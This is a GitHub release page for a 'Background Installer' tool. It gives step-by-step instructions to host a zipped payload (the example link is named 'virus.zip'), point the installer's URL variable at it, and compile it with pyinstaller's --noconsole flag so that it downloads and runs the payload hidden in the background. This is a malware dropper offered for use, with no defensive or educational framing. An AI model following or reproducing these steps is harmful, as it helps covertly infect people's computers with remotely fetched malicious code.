Skip to content

Background Installer (reciever.py,storage)

Latest
Compare
Choose a tag to compare
@akbartaimurr akbartaimurr released this 05 May 11:13
· 6 commits to main since this release

Once you are done building receiver.py and and have zipped receiver.py and storage, host these files somewhere on the web
ie https://thingwebsite.web.app/virus.zip
the link above is an example using firebase, not a real link tho

Then install the file attached to this release and edit the values:
url = "" on line 41 to the link of the zip you hosted

After editing the values you can build it with using pyinstaller:
pyinstaller --noconfirm --onefile --noconsole "path_to_bg-installer.py"
--noconsole attribute makes the installer run in the background